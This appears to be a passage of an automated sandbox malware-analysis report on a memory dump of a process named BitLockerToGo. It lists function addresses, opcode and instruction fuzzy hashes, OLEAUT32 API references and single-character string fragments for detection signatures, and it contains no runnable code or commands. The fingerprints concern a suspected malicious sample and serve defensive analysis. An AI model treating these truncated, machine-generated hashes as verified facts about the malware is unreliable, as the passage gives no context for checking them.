Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98614baca68f7b5314fb85a76fdc67669ce3655451a0e2c51828b81cb92ae106
Instruction ID: 175137ca6b94db295440a4ba98372230348d547828510eeaf6135d150e709c07
Opcode Fuzzy Hash: 98614baca68f7b5314fb85a76fdc67669ce3655451a0e2c51828b81cb92ae106
Instruction Fuzzy Hash: 4FA1C0356093029BD724DF18C890A2BB7E1FF89704F19892EE5C597351EB39EC50CB9A

Function 00408C50 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 603e1a0d98aaeab1789a5ea44eccb27e22ffa0a1d4d86109e4bd0a0136395e8d
Instruction ID: 8d0c28bb0c48296d27721a089f93448d3d462ebf9a61d16f4c6fd0e2c8c17c53
Opcode Fuzzy Hash: 603e1a0d98aaeab1789a5ea44eccb27e22ffa0a1d4d86109e4bd0a0136395e8d
Instruction Fuzzy Hash: B9A19575608301DFE704CF28D8507AAB7E0BB89356F05887DE889CB2A2C778D994CF85

Function 0044C380 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0971b00ab4ed3b847474e7de08eace91adb4f4947ce0301b4063e3d5fefebbf
Instruction ID: 89d09f3af8ba5945a08898355c329459a9c6e08ec362f3eba0cc4c77e928c884
Opcode Fuzzy Hash: a0971b00ab4ed3b847474e7de08eace91adb4f4947ce0301b4063e3d5fefebbf
Instruction Fuzzy Hash: 02818E742093019BE764DF18C990A2FB7E5FF89744F19892DE9858B351EB38EC10CB5A

Function 00414E9A Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 371f9f1b86c8ec590911090f3833d9d0202b400634625e8db77be4c96a7a4e85
Instruction ID: 59e2907545bb0dbf42578ee98ff6c0eab672abec779aa9e75d901982f7340893
Opcode Fuzzy Hash: 371f9f1b86c8ec590911090f3833d9d0202b400634625e8db77be4c96a7a4e85
Instruction Fuzzy Hash: 71A125B4500B409FD3218F25CA80B97FBF1AF46B05F54891EE8AA97B41D339F854CB58

Function 0044C090 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 795ba92d67ee6634c89ee0ab283074e576e972b3b43511bef5a7fd1d3b57b65f
Instruction ID: 9e9e6a4f1d95e446d26efefa7c5d0768f792999901588d18452cb2612289bc33
Opcode Fuzzy Hash: 795ba92d67ee6634c89ee0ab283074e576e972b3b43511bef5a7fd1d3b57b65f
Instruction Fuzzy Hash: 5C81CF306093019BE7509F58D8D0A2FB7E1FF95744F29882DE5C58B362DB79E810CB9A

Function 00409035 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e0cae6a9f69fe0a6ae9fc987b3c431e88018b01c16826f98e12cd7b7efb65aa
Instruction ID: e5474262b082868538cecca9b15ce62c0555fbf12bd185011be680c1a8a17d61
Opcode Fuzzy Hash: 7e0cae6a9f69fe0a6ae9fc987b3c431e88018b01c16826f98e12cd7b7efb65aa
Instruction Fuzzy Hash: 71A14935214201DFDB08CF28D990B6AB7E2BBC8315F19887DE456CB392E739D952CB45

Function 00439050 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f9dfcd78daa6d56472f204288b15b7b7b928cbd9684bec2ba8f2268bcf9baef
Instruction ID: 732d1cbb135f3026e30c7e0295ca3995b2f9fdeed138780b5110f48496c5a47b
Opcode Fuzzy Hash: 7f9dfcd78daa6d56472f204288b15b7b7b928cbd9684bec2ba8f2268bcf9baef
Instruction Fuzzy Hash: 9C61283764998147E728997C4C223AA7A934BDB330E3D937BE5B28B3D1D9AD8C025345

Function 0042E325 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 481dbe4eea468a6be7447a588c25b32d3d65a0cdcdb99495515e711f7ed59b90
Instruction ID: 414668d343edb9b65f0cad57b6f90474c9bb125f09162acbe99bb00ba658d9d2
Opcode Fuzzy Hash: 481dbe4eea468a6be7447a588c25b32d3d65a0cdcdb99495515e711f7ed59b90
Instruction Fuzzy Hash: 7F510C72F106254BCB19CF59D8906BEB6B2ABC9301F5D427DCD16AB385DB34AC01CB94

Function 0043FE50 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f367f8f5ecc45097846795fd34e8c8963d6acf5eabfc43f7f435ff06ce4ba9ef
Instruction ID: 50b394ea5dbbda8e8596ca12e293ddae58621ca84947ce095853a464195980ff
Opcode Fuzzy Hash: f367f8f5ecc45097846795fd34e8c8963d6acf5eabfc43f7f435ff06ce4ba9ef
Instruction Fuzzy Hash: 37515CB19087548FE314DF29D49535BBBE1BB88318F044E2EE5E987351E379DA088F86

Function 00405740 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 267318c6251ea4753fe695be5390cd795a84a31fed923a89d0b57e5408c76e53
Instruction ID: 5a6ab80a05071a2aa3372b9a507e69ac1a913765492b05f3e268ec5c9a3e63c7
Opcode Fuzzy Hash: 267318c6251ea4753fe695be5390cd795a84a31fed923a89d0b57e5408c76e53
Instruction Fuzzy Hash: 0651AFB5A043009FC714AF18C880927B7A5FF88328F15867DE855AB392D739EC51CF99

Function 00415DE0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f4b3c795ee6ab19dfe0d9050842bf8d67d42e8b0fccc30bf4ed9e95546d3f3
Instruction ID: 923436d36d53df716c74f63590216aca0d49928d188cbff66eb130d99aaf06a4
Opcode Fuzzy Hash: f5f4b3c795ee6ab19dfe0d9050842bf8d67d42e8b0fccc30bf4ed9e95546d3f3
Instruction Fuzzy Hash: F5515AB0A00B01CFD731CF24D980AA3B7F6AF86304F14CA2ED09687645E778E985CB59

Function 0044BC30 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e40c461cf9488db7b5c5a5928509e3e7ec3419beb675621924e859a5b37cf5f
Instruction ID: 86d31d668aeef8cb6dfacb89d9575bafe59a8531154d3b76079fc64d3d52dc46
Opcode Fuzzy Hash: 5e40c461cf9488db7b5c5a5928509e3e7ec3419beb675621924e859a5b37cf5f
Instruction Fuzzy Hash: 2341AE74608300ABE7149F14CCD1B2FBBE5EF8A715F24882DF5885B251C739D810CB9A

Function 0044BDC0 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67dbe9d4332bda558b0b80978581d057b205a8489599faf99fb9d41d11e7a71f
Instruction ID: 02f90ab5f800069b638e7c5dafdb159dc211e05168f4c4636f0c601544df9ee1
Opcode Fuzzy Hash: 67dbe9d4332bda558b0b80978581d057b205a8489599faf99fb9d41d11e7a71f
Instruction Fuzzy Hash: 00417E34608300ABE7149F15DC90B2FFBA5EF89715F24982DF58897352D735E8108B9A

Function 00411620 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d62a957a0cc4c9ed8ffb97ae37aaa9d600c95934e987225028cb25e01ffa8b9
Instruction ID: 2ae234bb7be320eb89259a80fbb4aee6defc7e60c0736805ff2a16e9a3472f55
Opcode Fuzzy Hash: 7d62a957a0cc4c9ed8ffb97ae37aaa9d600c95934e987225028cb25e01ffa8b9
Instruction Fuzzy Hash: A741F4726186514BD70C8B39886027ABBD29BC5310F198B3EF1E6C73D0D679C546DB15

Function 00440600 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac304c71f1f97231e2231876444c5a1444dbbdbd4cf47851d5a48a0b61a5a7f7
Instruction ID: 18a8e76c29e889a447f9d75d47ea0db43650253fe6be2208021fecc62be091ae
Opcode Fuzzy Hash: ac304c71f1f97231e2231876444c5a1444dbbdbd4cf47851d5a48a0b61a5a7f7
Instruction Fuzzy Hash: 3C213A329081244BE324EF19848053BF7E5EBDA705F07822EDAC5A7351E3389C3087E5

Function 00441500 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b9f6746789c6469199a07febc7bca138a5cacedce663fef4f9cc2eabfe58856
Instruction ID: c3244c9cc7e106f34fc4cefbeeb8616a6286c7efe136dad4eeca4d552e6442c6
Opcode Fuzzy Hash: 1b9f6746789c6469199a07febc7bca138a5cacedce663fef4f9cc2eabfe58856
Instruction Fuzzy Hash: B8310A32B087105FE3159D3988D026B77929BC9330F19873EE9B78B3D1D5398C865246

Function 0043C1F0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: b40a3bd3a83b15cb31d254c97c2e85b21848d43be6e4811056a5e46fc1cd2977
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 4C11E933E451D44EC3168D7C8480566BFA30A9B334F6993DAF4B4AB2D2D6268D8B8359

Function 00430F60 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817468b0d63bed9b2214da6d409efac0908220c3c66630cf8d017084a250f9dc
Instruction ID: 81548eb004ea96d1714b71a6914ac09dd7b0302b5ebab9e94c1683daa329ff05
Opcode Fuzzy Hash: 817468b0d63bed9b2214da6d409efac0908220c3c66630cf8d017084a250f9dc
Instruction Fuzzy Hash: 880184F570070187EB30DF5594E1B2BB2A86F88708F18563EE80567742DBBDEC05DAA9

Function 0040F0C7 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6c682be7f6c639e35151f3dd26db3d2f9a201e220a9855b76842ec4caed04b6
Instruction ID: ada432a434eb396cccbb0cfe766bf0d8b510ba901cd74ddbf0a4ef2aafa6ce07
Opcode Fuzzy Hash: b6c682be7f6c639e35151f3dd26db3d2f9a201e220a9855b76842ec4caed04b6
Instruction Fuzzy Hash: 7901D23251C7A1CBCB088F38A8413A937A25F92312F4A4F7CC4A2976D6C739D60A8A54

Function 00406B90 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6834f91b93a5bbea3c6d64dac81376141b7e53a2440d546e1531239708e2b6e3
Instruction ID: 5d478c688400ebdf7f0d72d9c8163922ea81c857ebe0a540632414c180f37690
Opcode Fuzzy Hash: 6834f91b93a5bbea3c6d64dac81376141b7e53a2440d546e1531239708e2b6e3
Instruction Fuzzy Hash: 52F0F62B7182254B9360CE7EDCC0527B2A6E7DA314B1A453DE941D3381C831F8159298

Function 0041ADD0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85f864bbe5ade3e27c5f02a9a7c385d7f5693c005e22179b8e2ff64e9ffe0c13
Instruction ID: a4f9b40866130c00c80e509154f439a4acde9c0d294dc23eb8059e40930ae279
Opcode Fuzzy Hash: 85f864bbe5ade3e27c5f02a9a7c385d7f5693c005e22179b8e2ff64e9ffe0c13
Instruction Fuzzy Hash: 2BF0A7B1A0426017DF2189559C84BB7BB9DCB87264F191466E84557202D2755C9182EA

Function 0040F6B7 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d1c42b4af778cebe41e992a3a558613b2d5392580533e7eed06cb70c992839d
Instruction ID: 9d6b82904faa5391f94eacca16a11f84fe5a279bf9a203afbf87c8743e13b3b6
Opcode Fuzzy Hash: 8d1c42b4af778cebe41e992a3a558613b2d5392580533e7eed06cb70c992839d
Instruction Fuzzy Hash: BDE04F20408300CAC3304F14C421373B2B0EF4B352F402975D8866B672E33DD80A931D

Function 00442BE0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 4f33d90a87247d9712f5f0e8f6a727d6c9cb9f7c1267bb7a1ff0fd76e4798a2d
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 99D0952150836106AB348E1D9400537F3F0F9C3701F85841FF581D3248D234DC00C16C

Function 0042DB73 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 052b2646b1fbd9343aebcbf445ba40ff11f9ed65821c57cd6663e1466a8c8b4c
Instruction ID: 696eae13236f994d861967cbc9bc90ea6e2722a6e2e2a79d6854c9825b22f854
Opcode Fuzzy Hash: 052b2646b1fbd9343aebcbf445ba40ff11f9ed65821c57cd6663e1466a8c8b4c
Instruction Fuzzy Hash: 30B092E9C00002C6D8112B113CC243AB034069360EF04223AE80633353A72ED11B685F

Function 0042AEDF Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1cf6ceff67874151094ec71449d50f9a1a28a6ceff7e6ae32cad8daa241a2e4
Instruction ID: b7420db5d4752f4040f7534b0705738559e13a509bb2fbd1cec50b748c7cd754
Opcode Fuzzy Hash: e1cf6ceff67874151094ec71449d50f9a1a28a6ceff7e6ae32cad8daa241a2e4
Instruction Fuzzy Hash: 79A022E0C08200C3C800CF00B8C2030F238830B28BF003030E00CFB303E322E2088A0E

Function 004388CB Relevance: 43.9, APIs: 1, Strings: 24, Instructions: 148memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043897B

Strings

r, xrefs: 00438A6C
+, xrefs: 00438B24
X, xrefs: 004389A8
0, xrefs: 00438BC8
i, xrefs: 00438A02
[, xrefs: 00438A5C
=, xrefs: 00438AB4
?, xrefs: 00438AC4
;, xrefs: 00438AA4
f, xrefs: 004389F8
3, xrefs: 00438AE4
_, xrefs: 00438A7C
5, xrefs: 00438AF4
-, xrefs: 00438B34
1, xrefs: 00438AD4
P, xrefs: 00438A3C
u, xrefs: 00438A0C
9, xrefs: 00438A94
,, xrefs: 00438B2C
T, xrefs: 00438A4C
S, xrefs: 00438994
7, xrefs: 00438B04
), xrefs: 00438B14
n, xrefs: 004389C6

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: )$+$,$-$0$1$3$5$7$9$;$=$?$P$S$T$X$[$_$f$i$n$r$u
API String ID: 2525500382-3874279348
Opcode ID: da22cc516dd46fa7fa962f098bbcc7c0d1a750a4602f7cc00237964897a67734
Instruction ID: ffb411ab270fdcebbc91cf3bcd63cdf8ab1d7996753163efea2c8cddf496643b
Opcode Fuzzy Hash: da22cc516dd46fa7fa962f098bbcc7c0d1a750a4602f7cc00237964897a67734
Instruction Fuzzy Hash: 6591936010CBC28DD3329B3C844875FBFD16BA7224F184B9DE1E98A2E2C7758546CB63

Function 00435E02 Relevance: 26.4, APIs: 1, Strings: 14, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00435EC7

Strings

Q, xrefs: 00436059
z, xrefs: 00436019
{, xrefs: 00436099
@, xrefs: 00435E30
t, xrefs: 00436089
m, xrefs: 00436029
u, xrefs: 00436069
p, xrefs: 00436039
G, xrefs: 00435E20
u, xrefs: 00436079
a, xrefs: 004360A9
0, xrefs: 00436176
k, xrefs: 00436049
s, xrefs: 00435E10

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: 0$@$G$Q$a$k$m$p$s$t$u$u$z${
API String ID: 2525500382-609348131
Opcode ID: 64a5be9ce98a6dca5b6bf0451f59d61529e6057af3dcc8a807d94e89aef8c03d
Instruction ID: 1f2a7aaa61942316e79cff561eef71a79cc70a3e34a0998c20ad3dd61be62a58
Opcode Fuzzy Hash: 64a5be9ce98a6dca5b6bf0451f59d61529e6057af3dcc8a807d94e89aef8c03d
Instruction Fuzzy Hash: 3CA1936050CBC28DD3328B3C894878BBED15BA7224F184B9DE5E94A3E2C7758506DB67

Function 0043649F Relevance: 26.4, APIs: 1, Strings: 14, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00436564

Strings

{, xrefs: 00436736
Q, xrefs: 004366F6
z, xrefs: 004366B6
@, xrefs: 004364CD
s, xrefs: 004364AD
m, xrefs: 004366C6
p, xrefs: 004366D6
u, xrefs: 00436716
t, xrefs: 00436726
k, xrefs: 004366E6
a, xrefs: 00436746
G, xrefs: 004364BD
0, xrefs: 00436805
u, xrefs: 00436706

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: 0$@$G$Q$a$k$m$p$s$t$u$u$z${
API String ID: 2525500382-609348131
Opcode ID: 4989bd66e383d2cef57f23cd1a0f725d1926076a7a5eb39061bd09a00a92faa2
Instruction ID: 8e9deab5219be9f690917b6db5e7b955392a565e159197b5a80d16d5376ed300
Opcode Fuzzy Hash: 4989bd66e383d2cef57f23cd1a0f725d1926076a7a5eb39061bd09a00a92faa2
Instruction Fuzzy Hash: 84A1736050CBC28DD3329A7C844878FBED16BA7224F184B9DE1E94A3E2C7758506D767

Function 00438292 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004382D8

Strings

c, xrefs: 004383BB
m, xrefs: 004383AB
y, xrefs: 0043830B
s, xrefs: 0043833B
}, xrefs: 0043832B
u, xrefs: 0043836B
l, xrefs: 004383B3
q, xrefs: 0043834B
k, xrefs: 0043837B
{, xrefs: 004382FB
o, xrefs: 0043839B
w, xrefs: 0043835B
i, xrefs: 0043838B

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: c$i$k$l$m$o$q$s$u$w$y${$}
API String ID: 1927566239-2949513137
Opcode ID: cb8883e779f83e055a64433442c00f76c7d7ccc75ba11a00284fee82c7cd456a
Instruction ID: 4f67ecf5a296d1bcbde1200e7dc61af584eaa3183519d8b9487fc150a1ec7c97
Opcode Fuzzy Hash: cb8883e779f83e055a64433442c00f76c7d7ccc75ba11a00284fee82c7cd456a
Instruction Fuzzy Hash: 6451D37050C7C18ED335CB2884987DEBFE0ABAA314F084A5DE0E98B392C7B95155CB67

Function 0043802B Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 79COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00438035
VariantInit.OLEAUT32 ref: 00438048

Strings

2, xrefs: 0043807E
7, xrefs: 004380B0
=, xrefs: 00438074
-, xrefs: 0043806A
?, xrefs: 004380C4
!, xrefs: 004380BA
-, xrefs: 00438092
\, xrefs: 004380A6
8, xrefs: 00438088
(, xrefs: 00438060
3, xrefs: 0043809C

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: !$($-$-$2$3$7$8$=$?$\
API String ID: 2610073882-1255047175
Opcode ID: ebb0f9d0673433456230df3c786f8de5cddac4da5d52b62959db75d3b56831f7
Instruction ID: 529f616303e3962aa18987ce1409ae6f69199f8acd66bb4ad54d7acc9fae5fdb
Opcode Fuzzy Hash: ebb0f9d0673433456230df3c786f8de5cddac4da5d52b62959db75d3b56831f7
Instruction Fuzzy Hash: 2A41E57000C3C18ED362DB28858875EBFE0AB9A328F485E5DF4E857392C7799509CB57

Function 00437E18 Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 75COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00437E26
VariantInit.OLEAUT32 ref: 00437E39

Strings

!, xrefs: 00437EAB
2, xrefs: 00437E6F
8, xrefs: 00437E79
(, xrefs: 00437E51
=, xrefs: 00437E65
\, xrefs: 00437E97
?, xrefs: 00437EB5
-, xrefs: 00437E83
-, xrefs: 00437E5B
7, xrefs: 00437EA1
3, xrefs: 00437E8D

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: !$($-$-$2$3$7$8$=$?$\
API String ID: 2610073882-1255047175
Opcode ID: c72f78ae20a8b46720c2b88b93bca4fa2f2605ccaf415e35097d704b4b1760b1
Instruction ID: 4f34b0ae171b2dd5686e921a7c502c00bb0df9b9bbf11cadd98c912cbd6e61b4
Opcode Fuzzy Hash: c72f78ae20a8b46720c2b88b93bca4fa2f2605ccaf415e35097d704b4b1760b1
Instruction Fuzzy Hash: 8D41E77040C3C19ED362DB28848874EBFE06B9A368F441E9DF4E49B392C7758549CB57

Function 00435C4A Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 68COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00435C54
VariantInit.OLEAUT32 ref: 00435C67

Strings

+, xrefs: 00435D0A
9, xrefs: 00435C9A
-, xrefs: 00435CFA
;, xrefs: 00435C8A
%, xrefs: 00435CBA
!, xrefs: 00435CDA
', xrefs: 00435CAA
), xrefs: 00435D1A
q, xrefs: 00435C82
#, xrefs: 00435CCA
/, xrefs: 00435CEA

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: !$#$%$'$)$+$-$/$9$;$q
API String ID: 2610073882-169618834
Opcode ID: 3a5e63793fa44aa8a3355ef1b7b50d3a8deeb0cc6643099c682c54fbd7fd521a
Instruction ID: 27bb552ebaa3bfa48e682bf56bcc6b24d4905bec393aedeb09085b94c362553e
Opcode Fuzzy Hash: 3a5e63793fa44aa8a3355ef1b7b50d3a8deeb0cc6643099c682c54fbd7fd521a
Instruction Fuzzy Hash: 7A41A37000C7C18AD3329A2894883DFBEE16BAA324F484A9DD5ED4B3E2C6754149CB67

Function 00435513 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 84COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0043551D
VariantInit.OLEAUT32 ref: 00435530

Strings

M, xrefs: 0043556B
{, xrefs: 0043555B
